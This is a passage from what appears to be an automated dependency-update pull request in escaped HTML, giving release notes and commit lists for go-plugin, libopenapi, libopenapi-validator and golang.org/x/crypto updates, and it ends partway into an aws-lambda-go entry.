href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/356\"\u003ehashicorp/go-plugin#356\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaushikiAnand\"\u003e\u003ccode\u003e@​KaushikiAnand\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/335\"\u003ehashicorp/go-plugin#335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dduzgun-security\"\u003e\u003ccode\u003e@​dduzgun-security\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/337\"\u003ehashicorp/go-plugin#337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhijeetviswa\"\u003e\u003ccode\u003e@​abhijeetviswa\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/342\"\u003ehashicorp/go-plugin#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/compliance-pr-automation-bot\"\u003e\u003ccode\u003e@​compliance-pr-automation-bot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/350\"\u003ehashicorp/go-plugin#350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ehttps://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/blob/main/CHANGELOG.md\"\u003egithub.com/hashicorp/go-plugin's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWhen go-plugin encounters a stack trace on the server stderr stream, it now raises output to a log-level of Error instead of Debug. [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003eGH-292\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDon't spend resources parsing log lines when logging is disabled [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003eGH-352\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for gRPC dial options to the \u003ccode\u003eDial\u003c/code\u003e API [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/257\"\u003eGH-257\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where reattaching to a plugin that exits could kill an unrelated process [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/320\"\u003eGH-320\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.1\u003c/h2\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress spurious \u003ccode\u003eos.ErrClosed\u003c/code\u003e on plugin shutdown [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/299\"\u003eGH-299\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bump google.golang.org/grpc to v1.58.3 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/296\"\u003eGH-296\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eplugin: Plugins written in other languages can optionally start to advertise whether they support gRPC broker multiplexing.\nIf the environment variable \u003ccode\u003ePLUGIN_MULTIPLEX_GRPC\u003c/code\u003e is set, it is safe to include a seventh field containing a boolean\nvalue in the \u003ccode\u003e|\u003c/code\u003e-separated protocol negotiation line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSupport muxing gRPC broker connections over a single listener [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/288\"\u003eGH-288\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eclient: Configurable buffer size for reading plugin log lines [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/265\"\u003eGH-265\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebuf\u003c/code\u003e for proto generation [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/286\"\u003eGH-286\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/net to v0.17.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/sys to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/text to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.5.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/92fb14e530db1a4d6d1053adb0f823155f52165d\"\u003e\u003ccode\u003e92fb14e\u003c/code\u003e\u003c/a\u003e update changelog for v1.7.0 (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/356\"\u003e#356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/d2a064ec63aa639d29c3d7b64a50776d42982c29\"\u003e\u003ccode\u003ed2a064e\u003c/code\u003e\u003c/a\u003e Complete the implementation of moving panics to the Error log level (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/353\"\u003e#353\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/b02adb3fdfefea44ec04ee09074fcc93a42e6302\"\u003e\u003ccode\u003eb02adb3\u003c/code\u003e\u003c/a\u003e Spend less time preparing to write log lines when the logger is disabled (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/352\"\u003e#352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/a938e9a3385168c366e944d3c16a95a9a9b03d31\"\u003e\u003ccode\u003ea938e9a\u003c/code\u003e\u003c/a\u003e [Compliance] - PR Template Changes Required (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/350\"\u003e#350\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/f4acdfe4f62c0daa216fc951a525ae578daadcae\"\u003e\u003ccode\u003ef4acdfe\u003c/code\u003e\u003c/a\u003e Bump protobuf from 4.24.4 to 4.25.8 in /examples/grpc/plugin-python (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/ba61a6548317254b855e92042150362cd17c7e0c\"\u003e\u003ccode\u003eba61a65\u003c/code\u003e\u003c/a\u003e [chore] : Bump the go group across 2 directories with 7 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/346\"\u003e#346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/64b8d7614c8e0753ad794817a0b034a976bfa97f\"\u003e\u003ccode\u003e64b8d76\u003c/code\u003e\u003c/a\u003e fix additional lint issues and expand linter scope (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/810097c69630b52c15e7ae5e128142069298ab1e\"\u003e\u003ccode\u003e810097c\u003c/code\u003e\u003c/a\u003e [chore] : Bump golang.org/x/net (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/c882484d2f5f3e97a56651924ae0f26e2f84ad74\"\u003e\u003ccode\u003ec882484\u003c/code\u003e\u003c/a\u003e [chore] : Bump the actions group with 3 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/345\"\u003e#345\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/21b9619042fccc8b03bd6fe97a977a77f74ca163\"\u003e\u003ccode\u003e21b9619\u003c/code\u003e\u003c/a\u003e IND-3869 enabling dependabot (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi` from 0.22.3 to 0.35.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi/releases\"\u003egithub.com/pb33f/libopenapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.35.1\u003c/h2\u003e\n\u003cp\u003eA big refactor of the low-level model, after years of growth and organic changes. runs faster and cooler now, fewer allocations, less memory, and less number crunching. runs fewer instructions faster, all for \u003cstrong\u003efree.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAlso fixes a bundling glitch that was keeping old references in play in the model after composed bundling.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features.\u003c/p\u003e\n\u003ch2\u003ev0.35.0\u003c/h2\u003e\n\u003cp\u003eThe release fixes an issue where \u003ccode\u003e$id\u003c/code\u003e was being parsed when inside examples. The index module was also heavily refactored to make it easier to read, operate, and understand, a huge cleanup of years of organic growth. Much more to come.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features, 7% more efficient.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/luke-hagar-sp\"\u003e\u003ccode\u003e@​luke-hagar-sp\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.4\u003c/h2\u003e\n\u003cp\u003eFixes security issues and patches issues \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/545\"\u003e#545\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/zhirschtritt\"\u003e\u003ccode\u003e@​zhirschtritt\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.3\u003c/h2\u003e\n\u003cp\u003eAddresses \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/143\"\u003epb33f/wiretap#143\u003c/a\u003e by adding reusable local reference-resolution helpers and ensuring that nested-reference context settings are consistently propagated from document-level config into index/resolver config.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.2\u003c/h2\u003e\n\u003cp\u003eFixes issue \u003ca href=\"https://redirect.github.com/daveshanley/vacuum/issues/821\"\u003edaveshanley/vacuum#821\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.1\u003c/h2\u003e\n\u003cp\u003eMinor bugfix for vacuum and some multi-file lookup edge cases, no new features, no breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.34.0\u003c/h2\u003e\n\u003ch2\u003eAdds support for \u003ca href=\"https://spec.openapis.org/arazzo/latest.html\"\u003eArazzo\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eDocs \u003ca href=\"https://pb33f.io/libopenapi/arazzo/\"\u003ehttps://pb33f.io/libopenapi/arazzo/\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eConfigurable JSONPath lookup\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi/pull/535\"\u003epb33f/libopenapi#535\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eUpdates JSONPath lookup in utils to be configuration-aware and safe with recent \u003ca href=\"https://github.com/pb33f/jsonpath\"\u003ehttps://github.com/pb33f/jsonpath\u003c/a\u003e behavior, especially with respect to WithLazyContextTracking().\u003c/p\u003e\n\u003cp\u003eDifferent lookup scenarios need different execution behavior and safety constraints. This keeps existing behavior by default while allowing explicit control and preventing incorrect cache reuse across different JSONPath engine settings.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/533\"\u003epb33f/libopenapi#533\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eNew \u003ccode\u003eCreateSchemaProxyRefWithSchema(ref string, schema *Schema)\u003c/code\u003e introduced\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix goroutine leak in schema\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/badb17a26aaf89190194e2fbdb1590b08ef25328\"\u003e\u003ccode\u003ebadb17a\u003c/code\u003e\u003c/a\u003e bumping coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/85682e1e48ed2be8cac175ce7ced4f2946c9cf5a\"\u003e\u003ccode\u003e85682e1\u003c/code\u003e\u003c/a\u003e fixing nil checks and borked pipeline.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/cda65e2d632670e0af023c1aa34945f935ec991c\"\u003e\u003ccode\u003ecda65e2\u003c/code\u003e\u003c/a\u003e more model refactoring and cleanup.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/10828caacd4b3253ba2fa9fb4ef930d9eaccdd07\"\u003e\u003ccode\u003e10828ca\u003c/code\u003e\u003c/a\u003e working through model performance refactor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/af72cd2a52fae2f3b16ca9f570f646cb6fc82afd\"\u003e\u003ccode\u003eaf72cd2\u003c/code\u003e\u003c/a\u003e refactoring schema performance and clarity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/65096b4e066d33bd3c9b5d5d4cbf772d584063a5\"\u003e\u003ccode\u003e65096b4\u003c/code\u003e\u003c/a\u003e fix stale references being returned after bundling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/da443c119275140cde89930b81b855d927fbf2b1\"\u003e\u003ccode\u003eda443c1\u003c/code\u003e\u003c/a\u003e rebased and ported luke's work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/2d7f1c67e45831d6d9ac9233f60a07a1cd128a67\"\u003e\u003ccode\u003e2d7f1c6\u003c/code\u003e\u003c/a\u003e address coverage issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/c85f4e8951d7197b96c51ac899c435489050a62e\"\u003e\u003ccode\u003ec85f4e8\u003c/code\u003e\u003c/a\u003e OH WINDOWS. PLEASE. STOP BEING STRANGE\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/660a62f9fccd506c4d3712adfa005ee4e50e6d46\"\u003e\u003ccode\u003e660a62f\u003c/code\u003e\u003c/a\u003e fixing windows issues.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi/compare/v0.22.3...v0.35.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi-validator` from 0.4.7 to 0.13.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi-validator/releases\"\u003egithub.com/pb33f/libopenapi-validator's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.13.3\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAnd fixes \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e fully\u003c/p\u003e\n\u003ch2\u003ev0.13.2\u003c/h2\u003e\n\u003cp\u003eFixes issues in wiretap\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eand issues\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.1\u003c/h2\u003e\n\u003cp\u003eAdds support for passing compiled schemas for document validation. Prevents another compilation step, saving on compute and memory.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003cp\u003eRefactored \u003ccode\u003eSchemaValidationFailure \u003c/code\u003estruct fields.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis is a breaking change,\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/188\"\u003epb33f/libopenapi-validator#188\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/200\"\u003epb33f/libopenapi-validator#200\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/mjbonifacio\"\u003e\u003ccode\u003e@​mjbonifacio\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAlso implemented a RadixTree design to speed up path lookup.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/217\"\u003epb33f/libopenapi-validator#217\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/its-hammer-time\"\u003e\u003ccode\u003e@​its-hammer-time\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.1\u003c/h2\u003e\n\u003cp\u003eAdds support for all authentication types.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/x-delfino\"\u003e\u003ccode\u003e@​x-delfino\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003cp\u003eAdds XML body validation with the addition of \u003ccode\u003eAllowXMLBodyValidation\u003c/code\u003e as a configuration option. Also adds support for \u003ccode\u003ex-www-form-urlencoded\u003c/code\u003e validation.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/ySnoopyDogy\"\u003e\u003ccode\u003e@​ySnoopyDogy\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1151bc5b91c4862406d096b628d43408f8f48237\"\u003e\u003ccode\u003e1151bc5\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e fully\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04d2b62899469b2510c63b144204b7e6d6e0dbce\"\u003e\u003ccode\u003e04d2b62\u003c/code\u003e\u003c/a\u003e fully address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/881f8cbbc7629f6e03c1449d402cbbda1e1f6c58\"\u003e\u003ccode\u003e881f8cb\u003c/code\u003e\u003c/a\u003e cleanup\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1e37fc1d278e0f32bf5eaa70751414b07cd3f99d\"\u003e\u003ccode\u003e1e37fc1\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/07b06ebb04115eb7eb60e78c618572deab5edfd9\"\u003e\u003ccode\u003e07b06eb\u003c/code\u003e\u003c/a\u003e upodated test to be more useful\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39485c117b6df302dd377572da0db7812a9f7d96\"\u003e\u003ccode\u003e39485c1\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/247\"\u003epb33f/libopenapi-validator#247\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39db7ef1bc65feb98a2c75589e37d811fcbc3d44\"\u003e\u003ccode\u003e39db7ef\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04189e533b6d6bcdb63c0752fd6a35530a0bd322\"\u003e\u003ccode\u003e04189e5\u003c/code\u003e\u003c/a\u003e address issue \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/ce277214ae87e91a8a5d21163811dd75ba91b336\"\u003e\u003ccode\u003ece27721\u003c/code\u003e\u003c/a\u003e Addressing  \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/16cd936076a92c4f23aa5975f3a3d2bce2501efd\"\u003e\u003ccode\u003e16cd936\u003c/code\u003e\u003c/a\u003e bump that coverage!\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi-validator/compare/v0.4.7...v0.13.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/crypto` from 0.41.0 to 0.48.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e08b06753d6a72f1fe375b6e0fefefb39917c165\"\u003e\u003ccode\u003ee08b067\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7d0074ccc6f17acbf2ebb10db06d492e08f887dc\"\u003e\u003ccode\u003e7d0074c\u003c/code\u003e\u003c/a\u003e scrypt: fix panic on parameters \u0026lt;= 0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/506e022208b864bc3c9c4a416fe56be75d10ad24\"\u003e\u003ccode\u003e506e022\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7dacc380ba001e8fe7c3c7a46bf3cbdaa5064df9\"\u003e\u003ccode\u003e7dacc38\u003c/code\u003e\u003c/a\u003e chacha20poly1305: error out in fips140=only mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/19acf81bd7bc7b558d18a550e8e023df2c33e742\"\u003e\u003ccode\u003e19acf81\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/3a1c6b4b61966d06b6469ad7bc15839ba76eeb89\"\u003e\u003ccode\u003e3a1c6b4\u003c/code\u003e\u003c/a\u003e x509roots/fallback: update bundle\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f4602e40409257658159002a9af6aedb875949fb\"\u003e\u003ccode\u003ef4602e4\u003c/code\u003e\u003c/a\u003e ssh/agent: fix flaky test by ensuring a writeable home directory\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/4e0068c0098be10d7025c99ab7c50ce454c1f0f9\"\u003e\u003ccode\u003e4e0068c\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e79546e28b85ea53dd37afe1c4102746ef553b9c\"\u003e\u003ccode\u003ee79546e\u003c/code\u003e\u003c/a\u003e ssh: curb GSSAPI DoS risk by limiting number of specified OIDs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f91f7a7c31bf90b39c1de895ad116a2bacc88748\"\u003e\u003ccode\u003ef91f7a7\u003c/code\u003e\u003c/a\u003e ssh/agent: prevent panic on malformed constraint\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/crypto/compare/v0.41.0...v0.48.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-lambda-go` from 1.49.0 to 1.54.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease 